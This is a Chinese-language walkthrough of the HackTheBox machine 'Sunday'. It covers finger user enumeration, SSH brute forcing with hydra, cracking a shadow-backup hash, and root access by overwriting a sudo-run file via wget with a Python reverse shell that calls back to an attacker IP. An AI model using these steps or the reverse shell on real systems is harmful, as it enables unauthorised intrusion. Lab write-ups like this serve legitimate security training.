信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.76 | TCP:79, 111, 515, 6787, 22022 |
$ nmap -p- 10.10.10.76 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
79/tcp open finger?
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer
6787/tcp open http Apache httpd
|_http-title: 400 Bad Request
|_http-server-header: Apache
22022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
Finger
$ wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -zxvf finger-user-enum-1.0.tar.gz
$ cd finger-user-enum-1.0
$ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图](https://img.4awl.net/img/59/ec5b231003d1e5c7a66f03654620cc.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图")
$ hydra -L user.txt -p 'sunday' ssh://10.10.1
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图1](https://img.4awl.net/img/1e/ddd9f30101a9ae11a573d3ec04392c.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图1")
username:sunny password:sunday
sunny 横向 sammy
$ ssh -p 22022 [email protected]
sunny@sunday:~$ cat /backup/shadow.backup
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图2](https://img.4awl.net/img/76/90fcd61e678a65c935a7d916abdb72.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图2")
$ echo '$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB'>hash
$ hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt --force
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图3](https://img.4awl.net/img/0e/d305b6e0b56fe01989857e0e011288.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图3")
username:sammy password:cooldude!
User.txt
be9b6b0e94d29be3bfc0373008b2b38a
权限提升
$ ssh -p 22022 [email protected]
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图4](https://img.4awl.net/img/24/3e1f778b520d8bc409e4d2330cfe66.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图4")
$ sudo /usr/bin/wget http://10.10.16.18/reverse.py -O /root/troll
#!/usr/bin/python
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.18",10032))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图5](https://img.4awl.net/img/37/8cd6788d62e5966e92bec2a310f94a.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图5")
$ sudo /root/troll
脚本将每五秒自动恢复/root/troll初始状态,所以需要快速输入
![[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图6](https://img.4awl.net/img/3a/39ba5c5d6bcb2654d26eeb50e586f8.jpg "[Meachines] [Easy] Sunday Finger网络用户枚举+Wget文件覆盖权限提…插图6")
Root.txt
59b946dc21f12651e440bbfd962cbff0
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
